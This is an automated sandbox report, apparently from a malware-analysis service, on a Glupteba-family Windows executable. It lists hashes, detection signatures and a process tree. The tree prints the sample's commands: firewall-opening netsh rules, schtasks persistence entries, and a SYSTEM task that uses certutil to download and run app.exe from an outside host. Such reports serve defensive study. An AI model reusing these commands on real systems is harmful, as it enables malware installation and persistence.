Analysis
-
max time kernel
37s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 22:49
Static task
static1
Behavioral task
behavioral1
Sample
6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
Resource
win7-20220414-en
General
-
Target
6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
-
Size
3.8MB
-
MD5
3b5778d847bc929874d54362a181d583
-
SHA1
4618610eae30b16673c5bcbcab53bccfec7cff06
-
SHA256
6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81
-
SHA512
49f496b14b59f8a1de74e7bb3e464df881790bbb6e1a5c234a9b79a65336abf4ba1de6fdd3d3c71fb67b67c0abac7d657b47e90bcce960acf3962ed5fd7b03d3
Malware Config
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4280-131-0x0000000005920000-0x0000000006016000-memory.dmp family_glupteba behavioral2/memory/4280-132-0x0000000000400000-0x00000000036BC000-memory.dmp family_glupteba -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 3460 created 4280 3460 svchost.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 780 bcdedit.exe -
Program crash 56 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4792 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4844 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 1888 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 1308 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 452 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4660 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 2600 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 2360 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 3556 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 1924 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4936 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 1532 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 2656 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 2920 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 3624 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 480 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4284 4280 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4348 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 2372 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 3144 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4328 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 896 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 1832 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 1256 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4836 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 3228 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4952 3768 WerFault.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 788 1964 WerFault.exe csrss.exe 4780 1964 WerFault.exe csrss.exe 2572 1964 WerFault.exe csrss.exe 2220 1964 WerFault.exe csrss.exe 4888 1964 WerFault.exe csrss.exe 5024 1964 WerFault.exe csrss.exe 4932 1964 WerFault.exe csrss.exe 5108 1964 WerFault.exe csrss.exe 1292 1964 WerFault.exe csrss.exe 3952 1964 WerFault.exe csrss.exe 3840 1964 WerFault.exe csrss.exe 4804 1964 WerFault.exe csrss.exe 3396 1964 WerFault.exe csrss.exe 1216 1964 WerFault.exe csrss.exe 4796 1964 WerFault.exe csrss.exe 3180 1964 WerFault.exe csrss.exe 2584 1964 WerFault.exe csrss.exe 3556 1964 WerFault.exe csrss.exe 1924 1964 WerFault.exe csrss.exe 3744 1964 WerFault.exe csrss.exe 2708 1964 WerFault.exe csrss.exe 2764 1964 WerFault.exe csrss.exe 3532 1964 WerFault.exe csrss.exe 1104 1964 WerFault.exe csrss.exe 1764 1964 WerFault.exe csrss.exe 768 1964 WerFault.exe csrss.exe 3228 1964 WerFault.exe csrss.exe 2912 1964 WerFault.exe csrss.exe 4400 1964 WerFault.exe csrss.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4788 schtasks.exe 2040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exepid process 4280 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe 4280 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exesvchost.exedescription pid process Token: SeDebugPrivilege 4280 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe Token: SeImpersonatePrivilege 4280 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe Token: SeTcbPrivilege 3460 svchost.exe Token: SeTcbPrivilege 3460 svchost.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
svchost.exedescription pid process target process PID 3460 wrote to memory of 3768 3460 svchost.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe PID 3460 wrote to memory of 3768 3460 svchost.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe PID 3460 wrote to memory of 3768 3460 svchost.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe"C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 3682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 3882⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 3842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 6082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 6962⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 8482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 8202⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 7842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 9362⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe"C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 3323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 3323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 5843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 6843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 7083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 7083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 6723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 3243⤵
- Program crash
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 7083⤵
- Program crash
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes4⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 3684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 4044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 3884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 5484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 5764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 4884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 4884⤵
- Program crash
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 8924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 9124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 9124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 9284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 9644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 10284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 9244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 6004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 11084⤵
- Program crash
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 10644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 9804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 11084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 7844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 10804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 6604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 10764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 10724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 6044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 11444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 8764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 12484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4280 -ip 42801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3768 -ip 37681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1964 -ip 19641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1964 -ip 19641⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
-
C:\Windows\rss\csrss.exe
-
C:\Windows\rss\csrss.exe
-
memory/544-148-0x0000000000000000-mapping.dmp
-
memory/780-150-0x0000000000000000-mapping.dmp
-
memory/820-138-0x0000000000000000-mapping.dmp
-
memory/1936-139-0x0000000000000000-mapping.dmp
-
memory/1964-145-0x0000000000400000-0x00000000036BC000-memory.dmpFilesize
50.7MB
-
memory/1964-140-0x0000000000000000-mapping.dmp
-
memory/1964-144-0x0000000005C00000-0x00000000062F6000-memory.dmpFilesize
7.0MB
-
memory/1964-143-0x0000000005800000-0x0000000005BA7000-memory.dmpFilesize
3.7MB
-
memory/2040-147-0x0000000000000000-mapping.dmp
-
memory/3768-134-0x0000000005308000-0x00000000056AF000-memory.dmpFilesize
3.7MB
-
memory/3768-135-0x0000000000400000-0x00000000036BC000-memory.dmpFilesize
50.7MB
-
memory/3768-133-0x0000000000000000-mapping.dmp
-
memory/4280-130-0x000000000556C000-0x0000000005913000-memory.dmpFilesize
3.7MB
-
memory/4280-132-0x0000000000400000-0x00000000036BC000-memory.dmpFilesize
50.7MB
-
memory/4280-131-0x0000000005920000-0x0000000006016000-memory.dmpFilesize
7.0MB
-
memory/4400-137-0x0000000000000000-mapping.dmp
-
memory/4788-146-0x0000000000000000-mapping.dmp
-
memory/4892-136-0x0000000000000000-mapping.dmp